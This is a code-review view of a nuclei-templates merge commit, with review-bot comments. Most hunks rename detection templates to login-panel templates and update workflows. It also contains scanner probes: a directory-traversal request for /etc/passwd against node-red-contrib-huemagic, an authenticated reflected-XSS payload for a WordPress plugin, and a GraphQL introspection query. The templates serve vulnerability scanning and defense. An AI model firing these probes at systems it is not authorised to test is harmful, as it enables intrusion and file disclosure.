Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-01-31 12:23:38 -05:00 committed by GitHub
commit 9aea02db73
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
49 changed files with 472 additions and 193 deletions


@ -0,0 +1,30 @@
name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog
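Review bot: The `git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github` line in the `Intalling Indexer` step attaches the PAT to every `https://github…` URL git touches for the rest of the job, not only the `nucleish-api` clone on the next line, and leaves it in the runner's global git config afterwards. Scope it to the one origin that needs it, e.g. `git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github.com/projectdiscovery/".insteadOf "https://github.com/projectdiscovery/"`, or drop the rewrite and pass the token on the clone URL only. The job also declares no `permissions:` block, so the default `GITHUB_TOKEN` grants apply even though these steps only read; add `permissions: contents: read` under `index:`. `actions/setup-go@v2` is a mutable tag, which is worth pinning to a commit SHA in a workflow that handles AWS and GitHub credentials, and the step name typo should read `Installing Indexer`.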


@ -0,0 +1,34 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
metadata:
shodan-query: title:"NODE-RED"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
tags: cve,cve2021,huemagic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
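Review bot: The `description` is a broken sentence (`Directory Traversal.in the res.sendFile API`) and the traversal path mixes `%2F` and `%2f`; tidy both so the template reads cleanly and the payload encoding is consistent. Suggested text: `description: node-red-contrib-huemagic 3.0.0 is vulnerable to directory traversal via hue/assets/..%2F in the res.sendFile API used in hue-magic.js, letting an unauthenticated attacker fetch arbitrary files from the host.` (PR:N in the CVSS vector supports "unauthenticated"). The `root:.*:0:0` regex only confirms the traversal on Unix-like hosts, so Node-RED installs on Windows would not be flagged; either state that limitation in the description or add a second, Windows-specific target file.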


@ -1,10 +1,12 @@
id: openam-detect
id: openam-panel
info:
name: Detect OpenAM and OpenSSO
name: OpenAM and OpenSSO Login Panel
author: philippedelteil
severity: info
tags: tech,openam
metadata:
shodan-query: http.title:"OpenAM"
tags: panel,openam,opensso,login
requests:
- method: GET
@ -16,6 +18,7 @@ requests:
- "{{BaseURL}}/sso/XUI"
- "{{BaseURL}}/sso/UI"
- "{{BaseURL}}/sso/UI/#login"
- "{{BaseURL}}/opensso/UI/Login"
- "{{BaseURL}}/openam/UI/login"
- "{{BaseURL}}/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/UI/Login"
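Review bot: The URL fragment in `"{{BaseURL}}/openam/UI/#login"` and `"{{BaseURL}}/openam/UI/#loginlogin"` is never transmitted (HTTP clients strip everything from `#` on), so both entries, like `/sso/UI/#login` above them, just request `/openam/UI/` and `/sso/UI/` a second time; drop them or replace them with real server-side paths such as the newly added `{{BaseURL}}/opensso/UI/Login`. `#loginlogin` additionally looks like a typo. The `path` list belongs to a request whose matchers continue after this hunk.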


@ -1,10 +1,12 @@
id: opensis-detect
info:
name: OpenSIS Detect
name: OpenSIS Login Panel
author: pikpikcu
severity: info
tags: tech,opensis
metadata:
shodan-query: http.title:"openSIS"
tags: panel,opensis,login
requests:
- method: GET
@ -12,6 +14,7 @@ requests:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
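Review bot: The template is retitled `OpenSIS Login Panel`, retagged `panel,opensis,login` and referenced from the workflow later in this commit as `exposed-panels/opensis-panel.yaml`, but its `id` is still `opensis-detect`; the other renamed templates in this commit (`openam-panel`, `openx-panel`, `phpcollab-panel`) update the id together with the file. Change it to `id: opensis-panel` so id, filename and workflow reference agree. The matcher list continues past the end of this hunk.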


@ -1,10 +1,12 @@
id: openx-detect
id: openx-panel
info:
name: OpenX detect
name: OpenX Login Panel
author: pikpikcu
severity: info
tags: tech,openx
metadata:
shodan-query: http.title:"OpenX"
tags: panel,openx,login
requests:
- method: GET


@ -1,22 +1,29 @@
id: phpcollab-detect
id: phpcollab-panel
info:
name: PhpCollab detect
name: PhpCollab Login Panel
author: pikpikcu
severity: info
tags: tech,phpcollab
metadata:
shodan-query: http.title:"PhpCollab"
tags: panel,phpcollab,login
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body


@ -1,10 +1,12 @@
id: remkon-manager-detect
id: remkon-manager-panel
info:
name: Remkon Device Manager Detect
author: pikpikcu
name: Remkon Device Manager Login Panel
author: pikpikcu,daffainfo
severity: info
tags: remkon,tech,panel
metadata:
shodan-query: http.title:"Remkon Device Manager"
tags: panel,remkon,login
requests:
- method: GET


@ -1,10 +1,12 @@
id: sage-detect
id: sage-panel
info:
name: Sage X3 Detect
author: pikpikcu
name: Sage X3 Login Panel
author: pikpikcu,daffainfo
severity: info
tags: tech,sage
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
requests:
- method: GET
@ -13,11 +15,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Sage X3</title>"
- "'/auth/sage-id/registerStart'"
condition: and
- type: status
status:


@ -0,0 +1,31 @@
id: seeddms-panel
info:
name: SeedDMS Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
shodan-query: http.title:"SeedDMS"
tags: panel,seeddms,login
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
condition: or
- type: status
status:
- 200
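Review bot: `info` carries only `name`, `author`, `severity` and `metadata`; the other panel templates added in this commit (`wazuh-panel`, `threatq-login`) also give a `description` and a `reference`, and the `seeddms-detect` file this one replaces had neither, so nothing documents what the two `out.Login.php` paths and the `ViewFolder.php` anchors are fingerprinting. Add a one-line `description:` stating that the SeedDMS document-management login page is being detected and a `reference:` pointing at the upstream project. With `redirects: true` and `max-redirects: 2`, it is also worth a comment that the `href="../out/out.ViewFolder.php?folderid=1"` variant is the post-redirect page, if that is why it was added.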


@ -0,0 +1,33 @@
id: threatq-login
info:
name: ThreatQ login panel
author: idealphase
severity: info
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
reference: https://www.threatq.com/threat-intelligence-platform/
tags: panel,threatq
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
- '<script src="/assets/js/threatq.min.js'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<script src="/assets/js/threatq.min.js\?(.*)'
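Review bot: The extractor regex `'<script src="/assets/js/threatq.min.js\?(.*)'` captures everything to the end of the line after the `?`, so the extracted value includes the closing `"></script>` and whatever follows rather than just the version/cache-buster token; bound it with `- '<script src="/assets/js/threatq.min.js\?([^"]+)"'`. Separately, every other panel template added in this commit uses a `-panel` id and a `login` tag (`seeddms-panel`, `wazuh-panel`, `xxljob-panel`), while this one is `id: threatq-login` with `tags: panel,threatq`; consider `id: threatq-panel` and `tags: panel,threatq,login` for consistency.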


@ -0,0 +1,26 @@
id: voipmonitor-panel
info:
name: VoipMonitor panel
author: Yanyun
severity: info
metadata:
shodan-query: http.title:"VoIPmonitor"
tags: panel,voipmonitor,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "appShareUrl = 'share.voipmonitor.org'"
- "VoIPmonitor"
condition: and


@ -0,0 +1,37 @@
id: wazuh-panel
info:
name: Wazuh Login Panel
author: cyllective,daffainfo
severity: info
description: Wazuh - The Open Source Security Platform
reference: https://github.com/wazuh/wazuh
metadata:
shodan-query: http.title:"Wazuh"
tags: panel,wazuh,login
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '&quot;version&quot;:&quot;([0-9.]+)&quot;'
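Review bot: `matchers-condition` is not set and nuclei defaults it to `or`, so the `status: 200` matcher alone satisfies the template and any host that answers `/app/login` with a 200 is reported as a Wazuh panel. Add `matchers-condition: and` between `path` and `matchers:` so the `&quot;id&quot;:&quot;wazuh&quot;` family of words must match as well. The deleted `wazuh-detect` had only the word matcher and did not have this false-positive path; it was introduced by adding the status matcher here.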


@ -0,0 +1,32 @@
id: webmodule-ee-panel
info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version: ([0-9.]+)'


@ -0,0 +1,30 @@
id: xxljob-panel
info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'


@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel
info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login
requests:
- method: GET
@ -13,11 +15,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or
- type: status
status:
- 200


@ -0,0 +1,36 @@
id: apollo-server-detect
info:
name: Apollo Server GraphQL introspection detection
author: idealphase
severity: info
description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL).
reference: https://github.com/apollographql/apollo-server
tags: apollo,tect,graphql
requests:
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Content-Type: application/json"
- type: word
part: body
words:
- "GraphQL introspection is not allowed by Apollo Server"
- type: status
status:
- 400
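Review bot: `tect` in `tags: apollo,tect,graphql` is a typo for `tech` and keeps this template out of tag-based `tech` runs; change it to `tags: apollo,tech,graphql`. The name `Apollo Server GraphQL introspection detection` is also misleading: the matchers only fire on a 400 containing `GraphQL introspection is not allowed by Apollo Server`, i.e. when introspection is disabled, whereas a server that answers the `__schema` query with 200 is not detected at all. Say so in the metadata, e.g. `name: Apollo Server Detect (introspection disabled)`, or add a second matcher for a successful `__schema` response if both cases are meant to be reported.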


@ -2,10 +2,10 @@ id: jsf-detection
info:
name: JavaServer Faces Detection
author: Moritz Nentwig
author: brenocss,Moritz Nentwig
severity: info
description: Searches for JavaServer Faces content on a URL.
tags: jsf,tech
tags: jsf,tech,primefaces,richfaces
requests:
- method: GET
@ -13,10 +13,24 @@ requests:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
max-redirects: 3
matchers-condition: or
matchers:
- type: word
words:
- "javax.faces.resource"
- "javax.faces.ViewState"
condition: or
- type: dsl
name: javafaces
dsl:
- "(contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState'))"
- type: dsl
name: primefaces
dsl:
- "contains(body, 'primefaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and
- type: dsl
name: richfaces
dsl:
- "contains(body, 'richfaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and
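Review bot: `contains(body, 'primefaces')` and `contains(body, 'richfaces')` are case-sensitive, so a page that only exposes the mixed-case product name (e.g. `PrimeFaces` in a comment or banner) without a lower-case resource path is missed by the named matchers even though `javafaces` fires. If the nuclei DSL in use provides it, lower-case the body first: `- "contains(to_lower(body), 'primefaces')"` and likewise for `richfaces`. Under `matchers-condition: or` the `javafaces` matcher also repeats the second condition of both library matchers, so a PrimeFaces or RichFaces hit is emitted once per matcher name; a short comment above `matchers:` noting that this is intended would save the next reader from "fixing" it.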


@ -14,12 +14,15 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"description" :"The Pega API'
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
part: header


@ -29,4 +29,4 @@ requests:
part: body
group: 1
regex:
- 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>'
- '<meta name="version" content="([0-9.]+)">'


@ -16,9 +16,9 @@ requests:
- type: word
part: body
words:
- default
- my_id
- root_url
- "default"
- "my_id"
- "root_url"
condition: and
- type: status


@ -18,6 +18,7 @@ requests:
- "<title>Ticket BBCode editor - SCEditor</title>"
- 'title="SCEditor"'
condition: and
- type: status
status:
- 200


@ -1,21 +0,0 @@
id: seeddms-detect
info:
name: Seeddms-
author: pussycat0x
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "<title>SeedDMS: Sign in</title>"
- type: status
status:
- 200


@ -5,10 +5,10 @@ info:
author: cyllective
severity: info
description: Detects Shopware CMS
tags: tech,shopware,cms
reference:
- https://github.com/shopware/shopware
- https://github.com/shopware/platform
tags: tech,shopware,cms
requests:
- method: GET
@ -16,12 +16,17 @@ requests:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/backend"
matchers-condition: and
matchers:
- type: word
part: body
condition: or
words:
- 'Realisiert mit Shopware'
- 'Realised with Shopware'
- 'Shopware Administration (c) shopware AG'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
condition: or
- type: status
status:
- 200


@ -1,22 +1,32 @@
id: strapi-cms-detect
info:
name: strapi CMS detect
author: cyllective
name: Strapi CMS detect
author: cyllective,daffainfo
severity: info
description: Detects strapi CMS
description: Open source Node.js Headless CMS to easily build customisable APIs
reference: https://github.com/strapi/strapi
tags: tech,strapi,cms
reference:
- https://github.com/strapi/strapi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/auth/login"
- "{{BaseURL}}/admin/init"
matchers:
- type: word
part: body
condition: or
words:
- '<title>Strapi Admin</title>'
- '"data"'
- '"uuid"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"strapiVersion":"([0-9.]+)"'
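Review bot: No `matchers-condition` is set (nuclei defaults to `or`) and the word list now contains `'"data"'` and `'"uuid"'` under `condition: or`, so any 200 from `/admin/auth/login` or `/admin/init`, or any JSON body containing `"data"`, is reported as Strapi; the previous version at least required `<title>Strapi Admin</title>`. Add `matchers-condition: and` before `matchers:` and replace the two generic words with something Strapi-specific, e.g. the `- '"strapiVersion"'` key the extractor below already depends on. Keep `'<title>Strapi Admin</title>'` for the login-page path.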


@ -3117,6 +3117,12 @@ requests:
- type: word
name: thinkphp
part: header
words:
- "ThinkPHP"
part: header
- type: word
name: apollo
part: body
words:
- "initApollo)(i.ApolloTargetServer.Self)"


@ -17,8 +17,8 @@ requests:
- type: word
part: body
words:
- access_key
- terraform
- "access_key"
- "terraform"
condition: and
- type: status


@ -1,10 +1,10 @@
id: thinkcmf-detection
info:
name: ThinkCMF Detection
author: pikpikcu
name: Detect ThinkCMF
author: pikpikcu,daffainfo
severity: info
tags: thinkcmf
tags: panel,thinkcmf,login
requests:
- method: GET
@ -13,12 +13,10 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "X-Powered-By: ThinkCMF"
part: header
condition: and
- '<meta name="author" content="ThinkCMF">'
- type: status
status:
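Review bot: The tags become `panel,thinkcmf,login`, but the template keeps `id: thinkcmf-detection`, is renamed `Detect ThinkCMF`, and the workflow further down in this commit still points at `technologies/thinkcmf-detect.yaml`; the commit's own convention moves login-page templates to `exposed-panels/*-panel.yaml` with a `-panel` id. Either keep this a technology detect (`tags: tech,thinkcmf`) or rename it consistently (`id: thinkcmf-panel`, `name: ThinkCMF Login Panel`, file `exposed-panels/thinkcmf-panel.yaml`) and fix the workflow reference to match. Swapping the `X-Powered-By: ThinkCMF` header word for the `<meta name="author" content="ThinkCMF">` body word also stops detecting installs that strip the meta tag but still send the header; if that is deliberate, a comment on the word matcher should say so. The `status` matcher continues past this hunk.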


@ -1,24 +0,0 @@
id: voipmonitor-detect
info:
name: VoipMonitor detect
author: Yanyun
severity: info
tags: tech,voipmonitor
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'share.voipmonitor.org'
- 'VoIPmonitor'
condition: and


@ -1,25 +0,0 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
reference:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'


@ -1,21 +0,0 @@
id: webmodule-ee-detection
info:
name: Webmodule Detection
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/7001
tags: webmodule-ee,tech
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200


@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/console"
matchers:
- type: word
words:


@ -11,14 +11,15 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: wondercms_"
- type: word
part: body
words:
- "Powered by WonderCMS"
- "https://www.wondercms.com"
condition: and
- type: status
status:
- 200


@ -13,11 +13,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Powered by wuzhicms"
- "五指CMS"
condition: or
- type: status
status:


@ -1,23 +0,0 @@
id: xxljob-admin-detect
info:
name: XXLJOB Admin Login
author: pdteam
severity: info
tags: tech,xxljob
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200


@ -4,6 +4,8 @@ info:
name: YApi Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.title:"YApi"
tags: tech,yapi
requests:
@ -13,7 +15,6 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:


@ -0,0 +1,41 @@
id: wp-code-snippets-xss
info:
name: Code Snippets Wordpress Plugin - XSS
author: dhiyaneshDK
severity: medium
description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link
reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/
tags: wordpress,xss,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
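Review bot: `{{username}}` and `{{password}}` are substituted into the form body verbatim, so a password containing `&`, `+`, `%` or `=` corrupts the login POST and the template silently never authenticates; URL-encode them, e.g. `log={{url_encode(username)}}&pwd={{url_encode(password)}}&wp-submit=Log+In&testcookie=1`, if the helper is available in the nuclei version targeted. The probe in the GET is likewise sent with raw `<`, `>` and `/` in the query string, which strict servers or a WAF may reject before WordPress reflects it; a percent-encoded form (`tag=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E`) leaves the body matcher on the decoded reflection unchanged. Finally, the `description` talks about "any logged-in admin who views the link" but does not say that the template itself needs valid credentials to reach `admin.php?page=snippets`; a sentence clarifying that `authenticated` refers to the scan, not the exploit, would help users reading the `info` block.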


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenAM related nuclei templates on a given target.
workflows:
- template: technologies/openam-detect.yaml
- template: exposed-panels/openam-panel.yaml
subtemplates:
- tags: openam


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenSIS related nuclei templates on a given target.
workflows:
- template: technologies/opensis-detect.yaml
- template: exposed-panels/opensis-panel.yaml
subtemplates:
- tags: opensis


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all PhpCollab related nuclei templates on a given target.
workflows:
- template: technologies/phpcollab-detect.yaml
- template: exposed-panels/phpcollab-panel.yaml
subtemplates:
- tags: phpcollab


@ -6,8 +6,6 @@ info:
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
workflows:
- template: technologies/sitecore-default-page.yaml
- template: exposed-panels/sitecore-login.yaml
- template: technologies/default-sitecore-page.yaml
subtemplates:
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
- template: misconfiguration/sitecore-debug-page.yaml
- tags: sitecore


@ -5,6 +5,6 @@ info:
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
workflows:
- template: technologies/thinkcmf-detection.yaml
- template: technologies/thinkcmf-detect.yaml
subtemplates:
- tags: thinkcmf


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target.
workflows:
- template: technologies/vmware-detect.yaml
- template: technologies/vmware/vmware-detect.yaml
subtemplates:
- tags: vmware


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target.
workflows:
- template: technologies/voipmonitor-detect.yaml
- template: exposed-panels/voipmonitor-panel.yaml
subtemplates:
- tags: voipmonitor


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target.
workflows:
- template: technologies/xxljob-admin-detect.yaml
- template: exposed-panels/xxljob-panel.yaml
subtemplates:
- template: default-logins/xxljob/xxljob-default-login.yaml